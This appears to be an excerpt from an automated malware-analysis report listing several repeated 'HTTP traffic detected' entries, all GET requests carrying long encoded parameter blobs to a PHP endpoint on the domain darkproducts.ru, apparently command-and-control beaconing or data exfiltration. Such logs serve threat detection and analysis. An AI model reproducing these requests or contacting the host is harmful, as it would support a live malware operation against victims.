Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETp1ERPBTW65keJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiImFGMmVTN4EWM2MGZiZ2M2UzY5MmY0MmMmJzNkZmZkJWYwcjM0EDM0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETp1ERPBTW65keJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiImFGMmVTN4EWM2MGZiZ2M2UzY5MmY0MmMmJzNkZmZkJWYwcjM0EDM0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETp1ERPBTW65keJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiImFGMmVTN4EWM2MGZiZ2M2UzY5MmY0MmMmJzNkZmZkJWYwcjM0EDM0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETp1ERPBTW65keJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiImFGMmVTN4EWM2MGZiZ2M2UzY5MmY0MmMmJzNkZmZkJWYwcjM0EDM0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETp1ERPBTW65keJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiImFGMmVTN4EWM2MGZiZ2M2UzY5MmY0MmMmJzNkZmZkJWYwcjM0EDM0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETp1ERPBTW65keJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiImFGMmVTN4EWM2MGZiZ2M2UzY5MmY0MmMmJzNkZmZkJWYwcjM0EDM0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=d1nIiojIzEzN2kTOlRGNzIWYlVGZmBjYilTZlRDO5IGZ5gTY4UjIsIyN3MWMklTOxUjM3IGM4cjN3YzM4EzYzYWOzMDMjVzMzYWMkNGOzQDNiojI4gDM4cTN1UGNldDOmRGNyQWO1QWNxMWO1ATZiRGOiBjIsISN4EmMmNGNzMTO3kzY1cDMxMTOiRjMhVGN2UTZwQmYkJjMiNmMxYWZiojI5ETOhF2YmdjM5YjZmljZ4ATNiJzNwcTOkRDNlZjM0AjI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETp1ERPBTW65keJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiImFGMmVTN4EWM2MGZiZ2M2UzY5MmY0MmMmJzNkZmZkJWYwcjM0EDM0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ru
